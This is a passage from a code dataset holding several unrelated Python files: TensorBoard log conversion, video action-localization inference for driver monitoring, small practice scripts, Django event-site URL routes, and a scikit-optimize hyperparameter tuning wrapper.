tag.startswith('eval'):\n if df_eval is None:\n df_eval = col\n else:\n df_eval = df_eval.merge(col, left_on='step', right_on='step', how='outer')\n else:\n if df is None:\n df = col\n else:\n df = df.merge(col, left_on='step', right_on='step', how='outer')\n if df is not None:\n df.insert(0, 'seed', seed)\n df.insert(1, 'algorithm', name)\n if big_df is None:\n big_df = df\n else:\n big_df = big_df.append(df, ignore_index=True)\n if df_eval is not None:\n df_eval.insert(0, 'seed', seed)\n df_eval.insert(1, 'algorithm', name)\n if big_df_eval is None:\n big_df_eval = df_eval\n else:\n big_df_eval = big_df_eval.append(df_eval, ignore_index=True)\n if big_df is not None:\n big_df.to_csv(f'{path}/train.csv', index=False)\n if big_df_eval is not None:\n big_df_eval.to_csv(f'{path}/eval.csv', index=False)\n","repo_name":"schobbejak/QMIX-Active-Wake-Control","sub_path":"tensorboard_to_csv.py","file_name":"tensorboard_to_csv.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"1651341408","text":"import torch\nimport numpy as np\nimport pandas as pd\nfrom scipy import stats\nfrom torchvision.utils import save_image\n\npd.options.mode.chained_assignment = None # default='warn'\n\n\ndef temporal_sampling(frames, start_idx, end_idx, num_samples):\n \"\"\"\n Given the start and end frame index, sample num_samples frames between\n the start and end with equal interval.\n Args:\n frames (tensor): a tensor of video frames, dimension is\n `num video frames` x `channel` x `height` x `width`.\n start_idx (int): the index of the start frame.\n end_idx (int): the index of the end frame.\n num_samples (int): number of frames to sample.\n Returns:\n frames (tersor): a tensor of temporal sampled video frames, dimension is\n `num clip frames` x `channel` x `height` x `width`.\n \"\"\"\n index = torch.linspace(start_idx, end_idx, num_samples)\n index = torch.clamp(index, 0, frames.shape[0] - 1).long().to(\"cuda\")\n frames = torch.index_select(frames, 0, index)\n return frames\n\n\n\"\"\"\nPerforms prediction step over all three camera views for a given set or aggregation of frames\n\nparams:\n cfg: cfg object with hyperparams\n model and model_2: both are pytorch models, which use the same checkpoint but run on diff. GPUs\n cam_view_clips: dict containing batches of frames for each camera view\n logger: logger object for printing\n resample: whether to resample current temporal interval 1s later than when it starts\n\nreturns:\n two dicts (1 for aggregated frames, 1 for current temporal interval's frames), each containing 3 prob matrices for each camera view\n\"\"\"\ndef predict_cam_views(cfg, model, model_2, cam_view_clips, agg_threshold, logger, resample=False, cur_iter=None):\n all_cam_view_probs = {}\n all_cam_view_probs_2 = {}\n\n for cam_view_type in cam_view_clips.keys():\n if(cam_view_type == \"Dashboard\") and cfg.TAL.PRINT_DEBUG_OUTPUT: logger.info(f\"NUM FRAMES AGGREGATED: {cam_view_clips[cam_view_type].shape[0]}\")\n\n # subsample 16 frames from clip agg for each cam angle, then make pred\n if cam_view_clips[cam_view_type].shape[0] == cfg.DATA.NUM_FRAMES:\n input = [cam_view_clips[cam_view_type].permute(1,0,2,3).unsqueeze(dim=0)]\n\n elif cam_view_clips[cam_view_type].shape[0] > cfg.DATA.NUM_FRAMES and resample == False:\n # evenly sample half the num of input frames from among last half of frames in clip aggregation pool\n start_idx_1 = 0 \n end_idx_1 = cam_view_clips[cam_view_type].shape[0] - 1 - cfg.DATA.NUM_FRAMES\n sampled_1 = temporal_sampling(cam_view_clips[cam_view_type], start_idx_1, end_idx_1, int(cfg.DATA.NUM_FRAMES*cfg.TAL.AGG_SAMPLING_RATIO))\n\n SINGLE_PROP_SAMPLING_RATIO = 1.0 - cfg.TAL.AGG_SAMPLING_RATIO\n\n # evenly sample half the num of input frames from last clip (most recently added proposal) in aggregation pool\n start_idx_2 = cam_view_clips[cam_view_type].shape[0] - cfg.DATA.NUM_FRAMES\n end_idx_2 = start_idx_2 + cam_view_clips[cam_view_type].shape[0] - 1\n sampled_2 = temporal_sampling(cam_view_clips[cam_view_type], start_idx_2, end_idx_2, int(cfg.DATA.NUM_FRAMES*SINGLE_PROP_SAMPLING_RATIO))\n\n sampled = torch.cat([sampled_1, sampled_2], dim=0)\n\n # aggregated input\n input = [sampled.permute(1,0,2,3).unsqueeze(dim=0)]\n\n # single clip input\n dev = 'cuda:1' if cfg.TAL.USE_2_GPUS == True else 'cuda:0'\n sampled_3 = cam_view_clips[cam_view_type][start_idx_2:]\n input_2 = [sampled_3.permute(1,0,2,3).unsqueeze(dim=0).to(dev)] \n\n cam_view_preds_2 = model_2(input_2).cpu()\n cam_view_probs_2 = cam_view_preds_2.numpy()\n all_cam_view_probs_2[cam_view_type] = cam_view_probs_2\n\n # if cur_iter == 56: #and cur_iter <= 59:\n # save_image(sampled, f\"{cfg.PROMPT.IMAGE_FOLDER}/input_1_no_resample_iter_{cur_iter}.png\")\n # save_image(sampled_3, f\"{cfg.PROMPT.IMAGE_FOLDER}/input_2_no_resample_iter_{cur_iter}.png\")\n\n elif cam_view_clips[cam_view_type].shape[0] > cfg.DATA.NUM_FRAMES and resample == True:\n # assumes uniform sampling of new proposal failed -> resample new proposal but only select frames from 2nd half of clip\n start_idx_1 = 0 \n end_idx_1 = cam_view_clips[cam_view_type].shape[0] - 1 - cfg.DATA.NUM_FRAMES\n sampled_1 = temporal_sampling(cam_view_clips[cam_view_type], start_idx_1, end_idx_1, int(cfg.DATA.NUM_FRAMES*cfg.TAL.AGG_SAMPLING_RATIO))\n\n start_idx_2 = cam_view_clips[cam_view_type].shape[0] - int(cfg.DATA.NUM_FRAMES/2)\n sampled_2 = cam_view_clips[cam_view_type][start_idx_2:]\n\n sampled = torch.cat([sampled_1, sampled_2], dim=0)\n\n # aggregated input\n input = [sampled.permute(1,0,2,3).unsqueeze(dim=0)]\n\n # if cur_iter == 56: #and cur_iter <= 59:\n # save_image(sampled, f\"{cfg.PROMPT.IMAGE_FOLDER}/input_1_resampled_iter_{cur_iter}.png\")\n\n cam_view_preds = model(input).cpu()\n cam_view_probs = cam_view_preds.numpy()\n all_cam_view_probs[cam_view_type] = cam_view_probs\n\n return all_cam_view_probs, all_cam_view_probs_2\n\n\n\"\"\"\nRe-performs predictions over short segment ~6s or less, as a means of strengthening classification confidence\nSpecifically samples frames from overlapping intervals that have not been sampled and predicted on already\n\nparams:\n cfg: cfg object with hyperparams\n model: model to use for this operation\n cam_view_clips: dict containing batches of frames for each camera view\n\nreturns:\n list of dicts (1 for each sampled interval), each containing 3 probability matrices, 1 for each camera view\n\"\"\"\ndef predict_short_segment(cfg, model, cam_view_clips):\n dev = 'cuda:1' if cfg.TAL.USE_2_GPUS == True else 'cuda:0'\n\n all_segment_probs = []\n segment_sample_idxs = []\n # do not include the most recently added frames, they may contain a diff action and low probs\n num_total_frames = cam_view_clips['Dashboard'].shape[0] - cfg.DATA.NUM_FRAMES\n sample_stride = cfg.DATA.NUM_FRAMES//4\n\n for start_idx in range(0, num_total_frames, sample_stride):\n all_cam_view_probs = {}\n end_idx = start_idx + cfg.DATA.NUM_FRAMES\n\n # if start_idx % cfg.DATA.NUM_FRAMES != 0:\n for cam_view_type in cam_view_clips.keys():\n sampled = cam_view_clips[cam_view_type][start_idx:end_idx]\n input = [sampled.permute(1,0,2,3).unsqueeze(dim=0).to(dev)]\n\n cam_view_preds = model(input).cpu()\n cam_view_probs = cam_view_preds.numpy()\n all_cam_view_probs[cam_view_type] = cam_view_probs\n\n all_segment_probs.append(all_cam_view_probs)\n segment_sample_idxs.append(start_idx)\n\n return all_segment_probs, segment_sample_idxs\n\n\n\"\"\"\nGiven proposal prob mats for a single localized action interval and prob mats for the short segment re-evaluation,\nas well as their respective starting frame index, re-order the prob mats according to their temporal boundaries\n\nparams:\n non_overlap_prob_mats: prob matrices accumulated from non-overlap sampling\n overlap_prob_mats: prob matrices obtained from short-seg re-eval (overlap sampling)\n overlap_sample_idxs: idxs corresponding to the first frame of each sampled overlapping interval\n\nreturns:\n list of prob mats, reordered temporal idx\n\"\"\"\ndef get_reordered_prob_mats(cfg, non_overlap_prob_mats, overlap_prob_mats, overlap_sample_idxs):\n # generate start idxs for non-overlapping prob mats\n non_overlap_sample_idxs = [i*cfg.DATA.NUM_FRAMES for i in range(len(non_overlap_prob_mats))]\n sample_idxs = non_overlap_sample_idxs + overlap_sample_idxs\n\n prob_mats = non_overlap_prob_mats + overlap_prob_mats\n\n _, reordered_prob_mats = (list(t) for t in zip(*sorted(zip(sample_idxs, prob_mats))))\n\n return reordered_prob_mats\n\n\n\"\"\"\nGenerates Gaussian weights\n\nparams:\n sigma: sigma term of Gaussian filter\n length: window size (number of samples to consider for filtering)\n\nreturns:\n NParray of Gaussian weights for a window size of 'length'\n\"\"\"\ndef generate_gaussian_weights(sigma, length):\n center = length // 2\n x = np.linspace(-center, center, length)\n kernel = np.exp(-x ** 2 / (2 * sigma ** 2))\n return kernel\n\n\n\"\"\"\nGiven list of prob matrices, computes the Gaussian Weighted Mean matrix\n\"\"\"\ndef apply_gaussian_weights(mats, sigma):\n prob_mats = np.vstack(mats)\n\n weights = generate_gaussian_weights(sigma, len(prob_mats))\n weighted_prob_mats = []\n\n for i, prob_mat in enumerate(prob_mats):\n weighted_prob_mats.append(prob_mat * weights[i])\n\n gaussian_avged_mat = np.sum(weighted_prob_mats, axis=0) / np.sum(weights, axis=0)\n\n return gaussian_avged_mat\n\n\n\"\"\"\nRemoves all action intervals that do not repeat consecutively and occur in between two actions of the same type\nClasses which the model is very sensitive to (4, 11, 12) have special filtering conditions to improve classification confidence\n > conditions based on common mistakes model makes\n\"\"\"\ndef filter_noisy_actions(prev_pred, prob_mats, segment_preds):\n idxs_to_filter = []\n\n for i in range(len(prob_mats)):\n if (prev_pred == 4 and np.array(prob_mats[i]).argmax() == 0) or \\\n (prev_pred == 11 and np.array(prob_mats[i]).argmax() == 12) or \\\n (prev_pred == 12 and np.array(prob_mats[i]).argmax() in [4,11]):\n \n idxs_to_filter.append(i)\n\n elif i > 0 and i + 1 < len(prob_mats):\n past = np.array(prob_mats[i-1]).argmax()\n present = np.array(prob_mats[i]).argmax()\n future = np.array(prob_mats[i+1]).argmax()\n\n present_cnt = sum(present == x for x in segment_preds)\n\n if past != present and present != future and past == future and present != prev_pred and present_cnt == 1:\n idxs_to_filter.append(i)\n \n filtered_prob_mats = [prob_mats[j] for j in range(len(prob_mats)) if j not in idxs_to_filter]\n filtered_segment_preds = [segment_preds[j] for j in range(len(prob_mats)) if j not in idxs_to_filter]\n\n return filtered_prob_mats, filtered_segment_preds\n\n\n\"\"\" \nConsolidates multiple action prob matrices by computing the Gaussian weighted average\n\nparams:\n consolidated_prob_mats: a list of prob mats (ordered temporally) for each sampled interval\n sigma: sigma term in Gaussian filtering equation\n filtering_threshold: list of thresholds for each action id for filtering bad probs \n\nreturns:\n final prediction and validity code determined by Gaussian weighted average\n\"\"\"\ndef consolidate_cum_preds_with_gaussian(cfg, consolidated_prob_mats:list, prev_agg_pred, segment_preds, sigma, filtering_thresholds, logger):\n prob_mats, segment_preds = filter_noisy_actions(prev_agg_pred, consolidated_prob_mats, segment_preds)\n\n gaussian_avged_mat = apply_gaussian_weights(prob_mats, sigma)\n\n final_prob = np.max(gaussian_avged_mat)\n final_pred = np.argmax(gaussian_avged_mat)\n\n code = 0\n # check for false positives below threshold or special cases (hints of false positives among high passing probs)\n if final_prob < filtering_thresholds[final_pred] or \\\n (final_pred in [3,6] and any(pred not in [0,3,6] for pred in set(segment_preds))) or \\\n (final_pred in [2,5] and any(pred not in [0,2,5] for pred in set(segment_preds))) or \\\n (final_pred == 4 and len(set(segment_preds)) > 2):\n code = -1\n\n if cfg.TAL.PRINT_DEBUG_OUTPUT: logger.info(f\"mats: {prob_mats}, Gaussian mat: {gaussian_avged_mat}, final prob: {final_prob:.3f}\")\n\n return final_pred, code, final_prob\n\n\"\"\"\nSame as Gaussian method but applies equal weight to all sampled interval probs\n\"\"\"\ndef consolidate_cum_preds_with_mean(cfg, consolidated_prob_mats: list, filtering_thresholds, logger):\n consolidated_prob_mats = np.vstack(consolidated_prob_mats)\n avged_mat = consolidated_prob_mats.mean(axis=0)\n\n final_prob = np.max(avged_mat)\n final_pred = np.argmax(avged_mat)\n\n if final_prob < filtering_thresholds[final_pred]:\n code = -1\n else:\n code = 0\n\n if cfg.TAL.PRINT_DEBUG_OUTPUT: logger.info(f\"mats: {consolidated_prob_mats}, mat: {avged_mat}, final prob: {final_prob:.3f}\")\n\n return final_pred, code\n\n \n\"\"\"\nConsolidates predictions from all camera angles for a single proposal\n\nreturns:\n the final prediction and the code indicating whether it is valid (passes threshold) or invalid\n\"\"\"\ndef consolidate_preds(cfg, cam_view_probs:dict, cam_view_weights:dict, filtering_threshold:float, logger):\n consolidated_probs = cam_view_weights['Dashboard'] * cam_view_probs['Dashboard']\\\n + cam_view_weights['Rear_view'] * cam_view_probs['Rear_view']\\\n + cam_view_weights['Right_side_window'] * cam_view_probs['Right_side_window']\n \n consolidated_pred = np.argmax(consolidated_probs)\n consolidated_prob = np.max(consolidated_probs)\n\n consol_code = -1 if consolidated_prob < filtering_threshold else 0\n\n if cfg.TAL.PRINT_DEBUG_OUTPUT: logger.info(f\"AGG pred: {consolidated_pred}, prob: {consolidated_prob:.3f}, code: {consol_code}\")\n\n return consolidated_pred, consol_code, consolidated_probs\n\n\n\"\"\"\nreturns list of tuples (start_row_idx, end_row_idx) for rows of the original df that should be merged into one row\n(start_row_idx, end_row_idx): start and end indices of rows that are consecutive and have the same pred\n\"\"\"\ndef get_merged_segment_idxs(video_df):\n merged_idxs = []\n\n row_idx = 0\n while row_idx < len(video_df):\n # get row pred and then find all other row idxs with same pred\n pred_class = video_df.iloc[[row_idx]][\"pred\"].to_list()[0]\n same_pred_idxs = video_df.index[video_df[\"pred\"] == pred_class].to_list()\n\n # find consecutive row idxs with same pred\n consec_pred_idxs = []\n for i, same_pred_row_idx in enumerate(same_pred_idxs):\n if(same_pred_row_idx >= row_idx):\n consec_pred_idxs.append(same_pred_row_idx)\n\n # fetch future start and current end timestamps\n if i < len(same_pred_idxs) - 1:\n next_interval_start = video_df.iloc[[same_pred_idxs[i+1]]][\"start_time\"].to_list()[0]\n curr_interval_end = video_df.iloc[[same_pred_row_idx]][\"end_time\"].to_list()[0]\n\n if(i == len(same_pred_idxs) - 1 or same_pred_idxs[i+1] - same_pred_row_idx != 1 or \\\n next_interval_start < curr_interval_end or next_interval_start - curr_interval_end > 10):\n row_idx = same_pred_row_idx+1\n break\n\n # assert list of idxs is consec\n assert sorted(consec_pred_idxs) == list(range(min(consec_pred_idxs), max(consec_pred_idxs)+1)), \"Elements not consecutive\"\n\n merged_idxs.append((consec_pred_idxs[0], consec_pred_idxs[-1]))\n\n return merged_idxs\n\n\n\"\"\"\nMerges consecutive temporal intervals with same prediction\n\nparams:\n path_to_txt: path to txt file storing unmerged submission results\n\"\"\"\ndef post_process_merge(path_to_txt, submission_filepath):\n df = pd.read_csv(path_to_txt, sep=\" \", names=['video_id', 'pred', 'start_time', 'end_time', 'prob'])\n\n # get merged idxs\n merged_idxs = get_merged_segment_idxs(df)\n\n for merged_idx_tuple in merged_idxs:\n merge_start_row = df.loc[[merged_idx_tuple[0]]]\n merge_end_row = df.loc[[merged_idx_tuple[1]]]\n\n video_id = merge_start_row[\"video_id\"].to_list()[0]\n activity_id = merge_start_row[\"pred\"].to_list()[0]\n start_time = merge_start_row[\"start_time\"].to_list()[0]\n end_time = merge_end_row[\"end_time\"].to_list()[0]\n mean_prob = df.iloc[merged_idx_tuple[0]:merged_idx_tuple[1]+1]['prob'].mean()\n\n with open(submission_filepath.rpartition('.')[0] + \"_merged.txt\", \"a+\") as f:\n f.writelines(f\"{video_id} {activity_id} {start_time} {end_time} {mean_prob}\\n\")\n\n\n\"\"\"\nParses each video id and elects only 1 action candidate per action id to remain\n\nparams:\n path_to_merged_txt: file path to merged submission file\n bonus_per_sec: score granted per each second of an action interval\n\"\"\"\ndef elect_action_candidates(path_to_merged_txt, submission_filepath, bonus_per_sec):\n df = pd.read_csv(path_to_merged_txt, sep=\" \", names=['video_id', 'pred', 'start_time', 'end_time', 'prob'])\n\n for video_id in df[\"video_id\"].unique():\n video_id_df = df.loc[df['video_id'] == video_id]\n\n for action_id in video_id_df['pred'].unique():\n action_id_df = video_id_df.loc[video_id_df['pred'] == action_id]\n\n if action_id_df.shape[0] > 1:\n action_id_df['score'] = action_id_df['prob'] + (action_id_df['end_time'] - action_id_df['start_time']) * bonus_per_sec\n loser_idxs = action_id_df.index[action_id_df['score'] != action_id_df['score'].max()].to_list()\n\n df.drop(loser_idxs,inplace=True)\n\n df.drop('prob', axis=1, inplace=True)\n df.to_csv(submission_filepath, index=False, header=False, sep=' ')\n\n\ndef generate_submission_file(submission_filepath, bonus_per_sec):\n post_process_merge(submission_filepath.rpartition('.')[0] + \"_unmerged.txt\", \n submission_filepath)\n \n elect_action_candidates(submission_filepath.rpartition('.')[0] + \"_merged.txt\", \n submission_filepath, \n bonus_per_sec)\n","repo_name":"CarrotPeeler/WPI-Naturalistic-Driving-Action-Recognition-MQP","sub_path":"slowfast/inference/TAL.py","file_name":"TAL.py","file_ext":"py","file_size_in_byte":17553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"15018645429","text":"import pprint\n\nplayer_list = {'Aidan' : {'arrows' : 1, 'bullets' : 23, 'bows' : 1, 'guns' : 4}, 'Thalita' : {'arrows' : 12, 'bullets' : 3, 'bows' : 2, 'guns' : 1}}\n\n\ndef display_inventory(players):\n grand_total = 0\n for name, inventory in players.items():\n total_items = 0\n print('In ' + name + '\\'s inventory, there are:')\n for item in inventory.items():\n print(str(item[1]) + ' ' + str(item[0]))\n total_items += item[1]\n print('Total items = ' + str(total_items))\n grand_total += total_items\n print('The grand total of items in the game is ' + str(grand_total))\n\ndef check_inventory(players, weapon):\n num_of_weapons = 0\n for name, inventory in players.items():\n num_of_weapons += inventory.get(weapon, 0)\n print('Total ' + str(weapon) + ': ' + str(num_of_weapons))\n\n\n\ndisplay_inventory(player_list)\ncheck_inventory(player_list, 'arrows')","repo_name":"redyelruc/BoringStuff","sub_path":"FantasyInventory.py","file_name":"FantasyInventory.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"34508766090","text":"\n# https://practice.geeksforgeeks.org/problems/stock-buy-and-sell-1587115621/1/?track=md-arrays&batchId=144\n\n\ndef max_profit(price, start, end):\n\n if end <= start:\n return 0\n \n profit = 0\n\n for i in range(start, end,1):\n\n for j in range(i+1, end+1,1):\n if (price[j] > price[i]):\n \n # Update the current profit\n curr_profit = price[j] - price[i] +\\\n max_profit(price, start, i - 1)+ \\\n max_profit(price, j + 1, end)\n\n # Update the maximum profit so far\n profit = max(profit, curr_profit)\n\n return profit\n\n\ndef stockBuySell(price,n):\n\n if n == 1:\n return 0\n\n i = 0\n while i < n-1:\n\n\n while ((i < (n - 1)) and (price[i + 1] <= price[i])):\n i += 1\n\n if (i == n - 1):\n break\n \n # Store the index of minima\n buy = i\n i += 1\n\n while ((i < n) and (price[i] >= price[i - 1])):\n i += 1\n \n # Store the index of maxima\n sell = i - 1\n \n print(\"Buy on day: \",buy,\"\\t\",\n \"Sell on day: \",sell)\n\n return (buy, sell)\n\n\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n price = [100, 180, 260, 310, 40, 535, 695]\n n = len(price)\n\n # print(max_profit(price, 0, n - 1))\n print(stockBuySell(price, len(price)))\n","repo_name":"ved93/deliberate-practice-challenges","sub_path":"code-everyday-challenge/n191_stocks_sell_buy.py","file_name":"n191_stocks_sell_buy.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"16832326816","text":"from django.conf.urls import url\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom . import views\n\nurlpatterns = [\n\turl(r'^$', views.index, name='event_index'),\n url(r'^events/$', views.index, name='event_index'),\n\n url(r'^events/(?P[0-9]+)/$', views.event_detail, name='event_detail'),\n url(r'^events/(?P[0-9]+)/register/$', views.register, name='event_register'),\n\turl(r'^events/create$', views.create, name='event_create'),\n url(r'^events/(?P[0-9]+)/cancel-register/$', views.cancel_register, name='event_cancel_register'),\n\n url(r'^user/info/$', views.myinfo, name='myinfo'),\n url(r'^signin/$', views.signin, name='signin'),\n url(r'^signup/$', views.signup, name='signup'),\n\turl(r'^signout/$', views.signout, name='signout'),\n\n url(r'^events/create/$',views.create,name='event_create')\n\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"yug095/Find-Free-Food","sub_path":"ffx/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"1360372180","text":"import numpy as np\nimport skopt\nfrom skopt import gp_minimize\nfrom sklearn.datasets import load_digits\nfrom sklearn.svm import SVC\nfrom sklearn.model_selection import train_test_split\nimport sys\nimport pandas as pd\nimport time\nimport datetime as dt\nfrom ParamTuning.ModelInterface import ModelInterface\n\n\n# ----------------------------------------------------\n# Simple skopt optimizer\n# ----------------------------------------------------\n# With this it is possible to run an optimization in \n# just a couple of commands.\n# ----------------------------------------------------\n# make_save: saves reusable results\n# make_log: saves human readable results\n# ----------------------------------------------------\n# old batch (boolean) is now mode, an integer with:\n# 0 --> monolithic optimization\n# 1 --> batch optimization\n# 2 --> nested cross validation\n# ----------------------------------------------------\nclass Optimizer(object):\n def __init__(self, model_name,\n kind,\n mode=0,\n auto_save=True, # Saves the results at the end of optimization\n make_save=True, # Saves the results iteration per iteration\n make_log=True, # Make a human readable log iteration per iteration\n path=None, # Define path in which to save results of optimization\n path_log=None): # Path in which to save logs\n\n # Inputs\n self.model_name = model_name\n self.kind = kind\n self.mode = mode\n self.auto_save = auto_save # saves the results without explictly calling the method\n self.make_save = make_save\n self.make_log = make_log\n self.path = path\n self.path_log = path_log\n # ModelInterface\n self.MI = None\n # Iteration counter\n self.iter_count = 0\n # Declaring result variable\n self.result = None\n\n # Setting the parameters of the optimizer\n def setParameters(self,\n n_calls=20,\n n_points=10000,\n n_random_starts=10,\n n_jobs=1,\n # noise = 'gaussian',\n noise=1e-7,\n acq_func='gp_hedge',\n acq_optimizer='auto',\n random_state=None,\n verbose=True,\n n_restarts_optimizer=5,\n xi=0.01,\n kappa=1.96,\n x0=None,\n y0=None):\n\n self.n_point = n_points\n self.n_calls = n_calls\n self.n_random_starts = n_random_starts\n self.n_jobs = n_jobs\n self.acq_func = acq_func\n self.acq_optimizer = acq_optimizer\n self.random_state = random_state\n self.n_restarts_optimizer = n_restarts_optimizer\n self.verbose = verbose\n self.xi = xi\n self.kappa = kappa\n self.noise = noise\n self.x0 = x0\n self.y0 = y0\n\n # Setting the model interface\n\n def defineMI(self, model_name=None, kind=None):\n if model_name is not None:\n self.model_name = model_name\n if kind is not None:\n self.kind = kind\n\n # Model interface\n self.MI = ModelInterface(model_name=self.model_name,\n kind=self.kind,\n mode=self.mode)\n\n # Defining the optimization method\n def optimize(self):\n\n # Initializing model interface if it's None\n if self.MI is None:\n self.defineMI()\n\n # Setting filename\n if self.path is None:\n self.path = str(dt.datetime.now().strftime(\"%m_%d_%H_%M_%S\"))\n\n # Checking if callback has to be called to make logs\n if (self.make_save is True):\n # Defining the callback function\n callback_function = self.callback_func\n else:\n callback_function = None\n\n # Making (or not) human readable logs\n self.MI.setSaveLog(self.make_log)\n\n # Path in which to save logs\n if self.path_log is not None:\n self.MI.setLogPath(self.path_log)\n\n self.result = gp_minimize(self.MI.getScoreFunc(),\n self.MI.getParams(),\n base_estimator=None,\n n_calls=self.n_calls,\n n_random_starts=self.n_random_starts,\n acq_func=self.acq_func,\n acq_optimizer=self.acq_optimizer,\n x0=self.x0,\n y0=self.y0,\n random_state=self.random_state,\n verbose=self.verbose,\n callback=callback_function,\n n_points=self.n_point,\n n_restarts_optimizer=self.n_restarts_optimizer,\n xi=self.xi,\n kappa=self.kappa,\n noise=self.noise,\n n_jobs=self.n_jobs)\n\n # Resetting the count for the logs\n self.MI.resetSaveLog()\n\n # Saving the obtained results\n if self.auto_save is True:\n self.saveRes(self.result)\n\n return self.result\n\n def callback_func(self, res):\n if self.make_save is True:\n self.saveRes(res)\n '''\n if self.make_log is True:\n self.saveLog(res)\n '''\n\n # Saving the results of the optimization with built-in method\n def saveRes(self, res):\n path = self.path + \".save.npz\"\n # The only way to save this shit\n np.savez(path, x0=res.x_iters, y0=res.func_vals)\n # skopt.dump(res, path, store_objective=False)\n # print(\"Results {0} successfully saved.\".format(path))\n\n '''\n #MOVED INTO MODEL INTERFACE CLASS\n #Method to save human readable logs\n def saveLog(self, res):\n #Parameters of the evaluation\n x = res.x_iters\n #Result of the evaluation\n y = res.func_vals\n #Taking the path provided\n path = self.path + \".log\"\n #Get hyperparameter names\n p_names = self.MI.getParamNames()\n #Maybe check len(p_names) == len(x) here\n\n #Opening a file and writing into it the logs\n with open(path, 'a') as log:\n to_write = \"ITERATION NUMBER \" + str(self.iter_count) + \"\\n\"\n log.write(to_write)\n for i in range(len(p_names)):\n to_write=str(str(p_names[i])+\": \"+str(x[self.iter_count][i])+\"\\n\")\n log.write(to_write)\n\n #Written this way to be easily found\n to_write=\"--outcome--: \"+str(y[self.iter_count])+\"\\n\\n\"\n log.write(to_write)\n\n #Increasing the iteration count\n self.iter_count = self.iter_count + 1\n '''\n\n # Loading model with built-in method (errors even with pickle)\n def loadModel(self, path=None):\n if (path is None):\n print(\"File path missing.\")\n else:\n\n # The only way to save this shit\n model = np.load(path)\n\n # Splitting the model\n self.x0 = model['x0']\n self.y0 = model['y0']\n print(model['x0'])\n print(model['y0'])\n print(\"File {0} loaded successfully.\".format(path))\n\n def loadModelHardCoded(self, path=None):\n # Splitting the model\n self.x0 = [\n 265,\n 46,\n 0.15898209867759425,\n 28,\n 0.4267309590102383,\n 0.7106015549429759,\n 0.446213857304653,\n 1.0,\n 0.6629430145505582,\n 0.6997710091846678,\n 0.7287763868516478,\n 22,\n 2309\n ]\n\n self.y0 = [-5.47228466301597]\n\n print(\"Loaded Hard Coded Model as Prior Knowledge\")\n\n # Load a custom dataset to train for the optimization\n def loadTrainData(self, X_train=None, Y_train=None, holder_train=None):\n # Initializing model interface if it's None\n if self.MI is None:\n self.defineMI()\n\n self.MI.loadTrainData(X_train, Y_train, holder_train)\n\n # Load a custom dataset to test for the optimization\n def loadValData(self, X_val=None, Y_val=None, holder_val=None):\n # Initializing model interface if it's None\n if self.MI is None:\n self.defineMI()\n\n self.MI.loadValData(X_val, Y_val, holder_val)\n\n # Load a custom dataset to test for the optimization\n def loadTestData(self, X_test=None, Y_test=None, holder_test=None):\n # Initializing model interface if it's None\n if self.MI is None:\n self.defineMI()\n\n self.MI.loadTestData(X_test, Y_test, holder_test)\n\n # ---------------------------------------------------------------\n # Batch train parameters\n # ---------------------------------------------------------------\n def batchTrain(self, tot_train_split, train_id):\n # Initializing model interface if it's None\n if self.MI is None:\n self.defineMI()\n\n self.MI.batchTrain(tot_train_split, train_id)\n\n def batchVal(self, val_id):\n # Initializing model interface if it's None\n if self.MI is None:\n self.defineMI()\n\n self.MI.batchVal(val_id)\n\n def batchTest(self, tot_test_split, test_id):\n # Initializing model interface if it's None\n if self.MI is None:\n self.defineMI()\n\n self.MI.batchTest(tot_test_split, test_id)\n\n def setLabels(self, x_label, y_label, es_ncv=False):\n # Initializing model interface if it's None\n if self.MI is None:\n self.defineMI()\n\n self.MI.setLabels(x_label, y_label, es_ncv)\n\n # ---------------------------------------------------------------\n\n # ---------------------------------------------------------------\n # Setting non tuned parameters for xgb\n # ---------------------------------------------------------------\n def setParamsXGB(self, verbosity=1,\n process_type=\"default\",\n tree_method=\"auto\",\n objective=\"binary:logistic\",\n num_parallel_tree=4,\n eval_metric=\"rmsle\",\n early_stopping_rounds=None):\n if self.MI is None:\n self.defineMI()\n\n self.MI.setParamsXGB(verbosity=verbosity,\n process_type=process_type,\n tree_method=tree_method,\n objective=objective,\n num_parallel_tree=num_parallel_tree,\n eval_metric=eval_metric,\n early_stopping_rounds=early_stopping_rounds)\n # --------------------------------------------------------------\n\n #---------------------------------------------------------------\n # Setting non tuned parameters for lgb\n #---------------------------------------------------------------\n def setParamsLGB(self, verbosity=1, \n process_type=\"default\", \n tree_method=\"auto\", \n #Not in tuning dict\n objective= 'binary',\n num_threads= 4,\n metric= ('cross_entropy','cross_entropy_lambda'),\n num_parallel_tree=4, \n eval_metric=\"rmsle\", \n early_stopping_rounds=None,\n is_unbalance=False):\n if self.MI is None:\n self.defineMI()\n \n self.MI.setParamsLGB(verbosity=verbosity,\n process_type=process_type,\n tree_method=tree_method,\n objective=objective,\n num_parallel_tree=num_parallel_tree,\n eval_metric=eval_metric,\n early_stopping_rounds=early_stopping_rounds,\n is_unbalance=is_unbalance)\n #---------------------------------------------------------------\n\n #---------------------------------------------------------------\n # Setting non tuned parameters for cat\n #---------------------------------------------------------------\n def setParamsCAT(self, verbosity= 1,\n boosting_type= \"Plain\",\n model_shrink_mode= \"Constant\",\n leaf_estimation_method= \"Newton\",\n bootstrap_type= \"Bernoulli\",\n early_stopping_rounds= 5):\n if self.MI is None:\n self.defineMI()\n\n self.MI.setParamsCAT(verbosity= verbosity,\n boosting_type= boosting_type,\n model_shrink_mode= model_shrink_mode,\n leaf_estimation_method= leaf_estimation_method,\n bootstrap_type= bootstrap_type,\n early_stopping_rounds= early_stopping_rounds)\n #---------------------------------------------------------------\n\n\n def setCategoricalFeatures(self,categorical_features=None):\n if self.MI is None:\n self.defineMI()\n 